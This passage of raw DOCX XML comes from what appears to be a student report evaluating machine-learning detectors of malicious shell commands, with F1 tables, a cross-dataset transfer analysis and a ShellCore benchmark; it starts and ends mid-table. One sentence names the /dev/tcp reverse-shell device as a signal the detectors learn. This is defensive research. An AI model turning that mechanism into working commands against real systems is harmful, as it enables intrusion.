            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.529</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.3587</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8808 / 0.8631</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.572</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.274</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>random_forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7963 / 0.7531</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.509</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1432</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The XGBoost-hybrid falls from 0.8761 in-domain to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.534 (D1→D2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.2756 (D2→D1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — a ~0.64 F1 drop, exactly the "does not generalize without augmentation" outcome the QuasarNix result predicts. The mechanism also matches: transfer ROC-AUC sinks toward chance (xgboost_hybrid D2→D1 AUC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.643</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and precision craters as the model floods the unseen benign register with false positives (D1→D2 FPR jumps to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.283</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Our source-separability probe (0.821 vs. 0.298 chance) is the direct evidence for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>why</w:t>
      </w:r>
      <w:r>
        <w:t>: the models learned corpus style, and style does not transfer — the same conclusion QuasarNix reaches by showing that only distribution-spanning augmentation restores generalization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Two nuances our data adds beyond the prediction.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> First, the collapse is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>asymmetric</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: D2→D1 is worse than D1→D2 for every model (e.g. baseline 0.336 vs. 0.572), because a model raised on the messy operational register has never seen the tight, canonical GTFOBins/HackTricks surface, whereas the reverse direction at least transfers some structure. Second, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CNN is the most transfer-robust model</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — on the punishing D2→D1 direction it holds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.331</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vs. the hybrid's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.184</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (and is essentially tied on D1→D2, 0.529 vs 0.534) — despite trailing in-domain, a direct echo of SLP's thesis that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>representation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> governs generalization: character-level features share sub-word structure across registers (an IP is an IP, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) where engineered-count and TF-IDF features latch onto corpus-specific token distributions. So our results not only confirm the generalization prediction, they refine it: the right </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>representation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> buys back a meaningful slice of the transfer gap even without QuasarNix-style augmentation — which is the natural next experiment this project points to.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 8.3 — Benchmarking Random Forest and Isolation Forest against ShellCore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Noam's half of 8.3 — the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>ShellCore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> comparator, for the two models he owns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Ben's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch8_3_tops_comparison.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> covers the Trizna/QuasarNix comparator for</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>XGBoost-hybrid and the CNN; the two are complementary, not overlapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>The metric reconstruction and the four non-comparability arguments are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">established in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch2_3_comparative_contribution_noam.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> and are **cited here,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>not re-derived**. What is new in this chapter is the decomposition in the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>third section, which attributes the gap to measured causes rather than</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>asserting one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The headline numbers, side by side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system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>corpus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>do-nothing floor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>headroom captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ShellCore char-level RF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IoT malware vs HTTP+bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10-fold CV, ungrouped</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.9978</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.667</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.3%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ShellCore term-level RF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>as above</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>as above</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.9984</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.667</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.5%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Our Random Forest, D1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>offensive corpora vs docs/history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>shape-grouped 80/20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7963</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.400</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>66.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Our Random Forest, D2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cowrie honeypot vs user history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>shape-grouped 80/20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7531</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.400</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>58.9%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Our Isolation Forest, D1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>as above</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>as above</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2492</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.400</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−25.1%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Our Isolation Forest, D2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
